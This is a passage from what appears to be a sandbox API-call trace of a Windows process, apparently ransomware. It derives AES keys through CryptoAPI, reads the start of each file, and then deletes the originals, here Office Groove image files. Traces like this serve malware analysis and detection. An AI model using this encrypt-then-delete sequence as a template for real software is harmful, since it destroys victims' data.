lpOverlapped=0x0) returned 1 [0163.659] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.659] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.659] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.660] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImagesMask16x16.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimagesmask16x16.bmp")) returned 1 [0163.661] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.662] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.662] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.662] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.662] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2308 [0163.662] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.665] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.665] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.665] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.666] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimages.jpg")) returned 1 [0163.668] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.668] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.668] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.668] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.668] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x638 [0163.668] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.689] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.689] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.689] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.690] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimagesmask.bmp")) returned 1 [0163.691] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.692] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.692] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.692] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.692] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0163.692] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.693] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.693] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.693] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.694] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\_help.txt")) returned 1 [0163.695] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0163.711] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0163.731] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0163.731] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.732] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.732] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.732] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.732] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3424 [0163.732] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.753] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.753] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.753] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.754] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendartooliconimages.jpg")) returned 1 [0163.774] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.775] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.775] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.775] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.775] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc38 [0163.775] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.792] CryptDestroyHash (hHash=0x284d628) returned 1 [0163.792] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.792] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.793] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendartooliconimagesmask.bmp")) returned 1 [0163.794] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.795] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.795] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.796] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.796] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3fa2 [0163.796] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.807] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.807] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.807] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.808] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarViewButtonImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendarviewbuttonimages.jpg")) returned 1 [0163.810] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.811] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.811] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.811] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.811] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b49 [0163.811] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.820] CryptDestroyHash (hHash=0x284d628) returned 1 [0163.820] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.820] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.821] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimage.jpg")) returned 1 [0163.823] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.824] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.824] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.824] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.824] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x778 [0163.824] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.830] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.830] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.830] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.831] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimagemask.bmp")) returned 1 [0163.836] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0163.864] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.864] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.864] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.864] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.864] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x44c9 [0163.865] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.876] CryptDestroyHash (hHash=0x284d628) returned 1 [0163.876] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.876] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.877] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Auto.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_auto.jpg")) returned 1 [0163.879] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.879] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.879] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.879] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.879] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c6e [0163.879] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.891] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.891] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.891] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.893] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_AutoMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_automask.bmp")) returned 1 [0163.895] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.895] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.895] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.895] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.895] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3356 [0163.895] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.907] CryptDestroyHash (hHash=0x284d628) returned 1 [0163.907] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.907] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHigh.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthigh.jpg")) returned 1 [0163.910] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.910] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.910] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.910] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.910] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c70 [0163.911] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.933] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.933] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.933] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.935] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHighMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthighmask.bmp")) returned 1 [0163.936] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.937] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.937] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.937] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.937] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2f79 [0163.937] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.972] CryptDestroyHash (hHash=0x284d628) returned 1 [0163.972] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.972] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.973] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlow.jpg")) returned 1 [0163.975] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0163.975] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0163.975] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.975] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0163.975] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c70 [0163.975] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0163.996] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.996] CryptDestroyKey (hKey=0x284d668) returned 1 [0163.996] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.998] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlowmask.bmp")) returned 1 [0163.999] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.000] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.000] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.000] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.000] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x480d [0164.000] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.005] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.005] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.005] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.006] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHigh.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehigh.jpg")) returned 1 [0164.008] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.008] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.008] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.008] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.008] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c6e [0164.008] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.015] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.015] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.015] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.016] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHighMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehighmask.bmp")) returned 1 [0164.017] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.018] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.018] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.018] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.018] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x46de [0164.018] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.030] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.030] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.030] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOff.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoff.jpg")) returned 1 [0164.032] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.032] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.033] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.033] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.033] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c6e [0164.033] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, 